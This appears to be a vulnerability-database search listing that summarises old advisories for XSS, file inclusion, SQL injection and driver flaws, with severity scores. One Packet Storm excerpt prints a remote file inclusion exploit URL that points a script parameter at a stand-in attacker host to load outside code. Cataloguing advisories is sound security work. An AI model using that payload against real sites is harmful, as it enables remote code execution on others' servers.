6679 matches found

EUVD
added 2007/01/31 11:0 a.m. | 3 views

EUVD-2007-0612

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote attackers to cause a denial of service (persistent application crash) via a crafted phsh hash attribute in a TXT key...

CVSS 7.8 | AI score 6 | EPSS 0.08339
Exploits: 1 | References: 8

Gentoo Linux
added 2007/01/27 12:0 a.m. | 28 views

X.Org X server: Multiple vulnerabilities

Background: The X Window System is a graphical windowing system based on a client/server model. Description: Multiple memory corruption vulnerabilities have been found in the ProcDbeGetVisualInfo and the ProcDbeSwapBuffers of the DBE extension, and ProcRenderAddGlyphs in the Render extension. Impac...

CVSS 10 | AI score 7.5 | EPSS 0.0339
Exploits: 0

Packet Storm
added 2007/01/27 12:0 a.m. | 28 views

xero-rfi.txt

C XORON - 2007 Bug name: Xero Portal v1.2 phpbbrootpath Local File Include Vulnerability Script Name: Xero Portal v1.2 Wrong Codes: require$phpbbrootpath . 'includes/bbcode.'.$phpEx; Exploit: www.target.com/scriptpat/admin/adminlinkdb.php?phpbbrootpath=http://evilscripts?...

AI score 7.4
Exploits: 0

Prion
added 2007/01/26 1:28 a.m. | 15 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in index.html (aka the administration page) in PHP Link Directory (phpLD) 3.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted link, which is triggered when the administrator uses the "Validate Links" functionality...

CVSS 4.3 | AI score 6.1 | EPSS 0.01085
Exploits: 1 | References: 4 | Affected Software: 1

CVE
added 2007/01/26 1:0 a.m. | 41 views

CVE-2007-0529

CVE-2007-0529 affects PHP Link Directory (phpLD) 3.0.6 and earlier. The vulnerability is a Cross-Site Scripting (XSS) in the admin page index.html, exploitable via a crafted link and triggered when the administrator uses the "Validate Links" functionality. The CVSS 2.0 base score is 4.3 (Medium) ...

CVSS 4.3 | AI score 5.7 | EPSS 0.01085
Exploits: 1 | References: 4 | Affected Software: 1

security_vulns
added 2007/01/01 12:0 a.m. | 7 views

Kerio Winroute Firewall 5.10 users credentials leak

Application: Kerio Winroute Firewall 5.10 Vendor: Kerio Technologies Inc. Vendor Site: http://www.kerio.com Remote: Yes Exploitable: Yes Risk level: Critical if proxy requires authentication Authors: Alexander Antipov & 3APA3A aka Pig Killer Authors Sites: http://www.securitylab.ru...

AI score 0.4
Exploits: 0

exploitpack
added 2006/12/16 12:0 a.m. | 17 views

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized...

AI score 7.4
Exploits: 0

Exploit DB
added 2006/12/16 12:0 a.m. | 30 views

eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion

source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts. By combining thi...

AI score 7.4
Exploits: 0

Cvelist
added 2006/12/07 5:0 p.m. | 16 views

CVE-2006-6369

SQL injection vulnerability in lib/entryreplyentry.php in Invision Community Blog Mod 1.2.4 allows remote attackers to execute arbitrary SQL commands via the eid parameter, when accessed through the "Preview message" functionality...

AI score 8.4 | EPSS 0.01028
Exploits: 0 | References: 4

NVD
added 2006/12/01 12:28 a.m. | 16 views

CVE-2006-6196

Cross-site scripting (XSS) vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field (txtsearchtext parameter)...

CVSS 6.8 | AI score 5.7 | EPSS 0.01492
Exploits: 1 | References: 6

Cvelist
added 2006/12/01 12:0 a.m. | 23 views

CVE-2006-6196

Cross-site scripting (XSS) vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field (txtsearchtext parameter)...

AI score 5.7 | EPSS 0.01492
Exploits: 1 | References: 6

CVE
added 2006/12/01 12:0 a.m. | 35 views

CVE-2006-6196

CVE-2006-6196 describes a cross-site scripting (XSS) vulnerability in the search functionality of the Fixit iDMS Pro Image Gallery. The issue allows remote attackers to inject arbitrary web script or HTML via the search field (txtsearchtext parameter). The NVD entry lists a CVSSv2 base score of 6...

CVSS 6.8 | AI score 5.9 | EPSS 0.01492
Exploits: 1 | References: 6 | Affected Software: 1

Gentoo Linux
added 2006/11/07 12:0 a.m. | 19 views

NVIDIA binary graphics driver: Privilege escalation vulnerability

Background: The NVIDIA binary graphics driver from NVIDIA Corporation provides the kernel module and the GL modules for graphic acceleration on the NVIDIA based graphic cards. Description: Rapid7 reported a boundary error in the NVIDIA binary graphics driver that leads to a buffer overflow in the...

CVSS 7.5 | AI score 7.3 | EPSS 0.26046
Exploits: 1

CVE
added 2006/10/20 5:0 p.m. | 39 views

CVE-2006-5430

CVE-2006-5430 is an XSS vulnerability affecting db-central (dbc) Enterprise CMS and db-central CMS, exploitable through the search needle parameter. The core issue is a reflected/script injection in the search functionality, enabling remote attackers to inject arbitrary script/HTML. The CVSS v2 v...

CVSS 6.8 | AI score 5.8 | EPSS 0.01242
Exploits: 0 | References: 5 | Affected Software: 2

NVD
added 2006/10/10 4:6 a.m. | 12 views

CVE-2006-5168

Cross-site scripting (XSS) vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

CVSS 4.3 | AI score 5.7 | EPSS 0.0112
Exploits: 0 | References: 5

Cvelist
added 2006/10/04 4:0 p.m. | 23 views

CVE-2006-5168

Cross-site scripting (XSS) vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

AI score 5.7 | EPSS 0.0112
Exploits: 0 | References: 5

FreeBSD
added 2006/10/04 12:0 a.m. | 15 views

mod_pubcookie -- Empty Authentication Security Advisory

Nathan Dors, Pubcookie Project reports: An Abuse of Functionality vulnerability in the Pubcookie authentication process was found. This vulnerability allows an attacker to appear as if he or she were authenticated using an empty userid when such a userid isn't expected. Unauthorized access to web...

AI score 3.1
Exploits: 0 | References: 1

securityvulns
added 2006/10/03 12:0 a.m. | 37 views

Pebble 2.0.0 RC[1,2] XSS vulnerability

Software: Pebble Version: 2.0.0 RC1 - 2.0.0 RC2 Author: Simon Brown Homepage: http://pebble.sourceforge.net Abstract Pebble is a blogging system built upon java and XML. There is no database to store the data into but just XML is used instead. Description Vulnerability: XSS vulnerability in...

AI score 6
Exploits: 0

securityvulns
added 2006/09/23 12:0 a.m. | 33 views

RE: Computer Associates eTrust Security Command Center Multiple Vulnerabilities

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 22-Sep-2006 Software: Computer Associates - eTrust Security Command Center http://www3.ca.com/solutions/Product.aspx?ID=4351 "eTrust Security Command Center helps you discover and prioritize relevan...

AI score 0.1
Exploits: 0

securityvulns
added 2006/08/23 12:0 a.m. | 37 views

EEYE:ALERT: MS06-042 Related Internet Explorer 'Crash' is Exploitable

MS06-042 Related Internet Explorer 'Crash' is Exploitable Date: August 22, 2006 Severity: High Systems Affected: Windows 2000 with IE6 SP1 and MS06-042 hotfix installed Windows XP SP1 with IE6 SP1 and MS06-042 hotfix installed Overview: On August 8th Microsoft released MS06-042 which was a...

AI score 7.2
Exploits: 0